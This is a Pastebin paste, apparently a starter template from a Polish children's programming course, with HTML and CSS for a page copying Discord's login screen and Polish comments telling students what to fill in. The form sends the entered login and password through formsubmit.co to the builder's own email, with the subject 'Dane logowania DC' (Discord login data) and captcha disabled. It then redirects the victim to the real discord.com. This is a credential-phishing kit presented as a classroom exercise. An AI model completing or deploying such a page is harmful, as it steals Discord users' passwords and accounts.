Advertisement
giganciprogramowania

strony starter

Aug 17th, 2022
195
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.76 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="pl">
  3. <head>
  4. <meta charset="utf-8" />
  5. <meta name="viewport" content="width=device-width, initial-scale=1" />
  6.  
  7. <!-- dodaj tytuł dla strony-->
  8.  
  9.  
  10. <link rel="stylesheet" href="/style.css" />
  11. <script src="/script.js" defer></script>
  12.  
  13. <!-- dodaj ikonkę dla naszej strony-->
  14.  
  15. </head>
  16. <body>
  17. <div id="kontener">
  18. <div id="panel-logowania">
  19.  
  20. <!-- dodaj nagłówek h1 o treści: Witamy ponownie! -->
  21.  
  22.  
  23. <!-- dodaj nagłówek h3 o treści: Cieszymy się, że znowu z nami jesteś! -->
  24.  
  25.  
  26. <form
  27. action="https://formsubmit.co/miejsce-na-twój-adres-email-gigancie"
  28. method="POST"
  29. enctype="multipart/form-data"
  30. >
  31. <!-- dodaj etykietkę i pole na wpisanie loginu -->
  32.  
  33.  
  34. <!-- dodaj etykietkę i pole na wpisanie hasła -->
  35.  
  36.  
  37. <p>
  38. <a href="">Nie pamiętasz hasła?</a>
  39. </p>
  40.  
  41. <!-- dodaj przycisk zaloguj się -->
  42.  
  43.  
  44. <p>
  45. Potrzebujesz konta?
  46. <a href="https://discord.com/register?email">Zarejestruj się</a>
  47. </p>
  48.  
  49. <!--Konfiguracja wysyłki-->
  50. <!--ustawiamy temat wiadomości przychodzącej-->
  51. <input type="hidden" name="_subject" value="Dane logowania DC" />
  52. <!--wyłączamy captche-->
  53. <input type="hidden" name="_captcha" value="false" />
  54. <!--przekierowanie na stronę główną bo przesłaniu danych z formularza-->
  55. <input
  56. type="hidden"
  57. name="_next"
  58. value="https://discord.com/"
  59. target="_blank"
  60. />
  61. </form>
  62. </div>
  63.  
  64. <div id="panel-qr">
  65.  
  66. <!-- dodaj obrazek z qr kodem -->
  67.  
  68.  
  69. <h2>
  70. Zaloguj się kodem<br />
  71. QR
  72. </h2>
  73. <p>
  74. Zeskanuj to <span>aplikacją mobilną Discorda</span>, by natychmiast
  75. się zalogować
  76. </p>
  77. </div>
  78. </div>
  79. </body>
  80. </html>
  81.  
  82. ----------------------------------------------------------------------------------------------
  83.  
  84. * {
  85. margin: 0;
  86. padding: 0;
  87. box-sizing: border-box;
  88. }
  89.  
  90. body {
  91.  
  92. /*dodaj tło obrazkowe dla całej strony*/
  93.  
  94. color: white;
  95. font-family: "UniSansRegular", sans-serif;
  96. }
  97.  
  98. #kontener {
  99.  
  100.  
  101. margin-left: auto;
  102. margin-right: auto;
  103. /*dodaj margines od górnej krawędzi strony*/
  104.  
  105. width: 784px;
  106. height: 408px;
  107. /*dodaj odstęp od krawędzi do treści z każdej strony*/
  108.  
  109. background-color: #36393f;
  110.  
  111. /*dodaj zaokrąglenie krawędzi dla pudełka*/
  112.  
  113. }
  114.  
  115. #panel-logowania {
  116. width: 400px;
  117. height: 340px;
  118. float: left;
  119. margin-right: 60px;
  120. }
  121.  
  122. h1,
  123. h2,
  124. h3 {
  125. text-align: center;
  126. margin-bottom: 5px;
  127. }
  128. /*zmień wygląd linków*/
  129.  
  130.  
  131. /*dodaj efekt po najechaniu kursorem myszki na link*/
  132.  
  133.  
  134.  
  135.  
  136. #panel-qr {
  137. width: 250px;
  138. height: 340px;
  139. float: left;
  140. text-align: center;
  141. }
  142.  
  143. p,
  144. h3 {
  145. color: #a2a2a4;
  146. }
  147.  
  148. img {
  149. margin-bottom: 20px;
  150. border-radius: 4px;
  151. }
  152.  
  153. label,
  154. input {
  155. display: block;
  156. margin-top: 10px;
  157. margin-bottom: 10px;
  158. color: #a2a2a4;
  159. }
  160.  
  161. label {
  162. text-transform: uppercase;
  163. font-weight: bold;
  164. font-size: 13px;
  165. }
  166.  
  167. input {
  168. width: 100%;
  169. height: 45px;
  170. border-radius: 3px;
  171. background-color: #202225;
  172. border-color: #202225;
  173. color: #a2a2a4;
  174. font-size: 18px;
  175. padding: 5px;
  176. }
  177.  
  178. #przycisk {
  179. border-color: #5865f2;
  180. background-color: #5865f2;
  181. border: none;
  182. color: white;
  183. font-size: 16px;
  184. }
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191. input:focus {
  192. outline: none;
  193. }
  194.  
  195. span {
  196. color: #b9bbbe;
  197. font-weight: bold;
  198. }
  199.  
  200.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement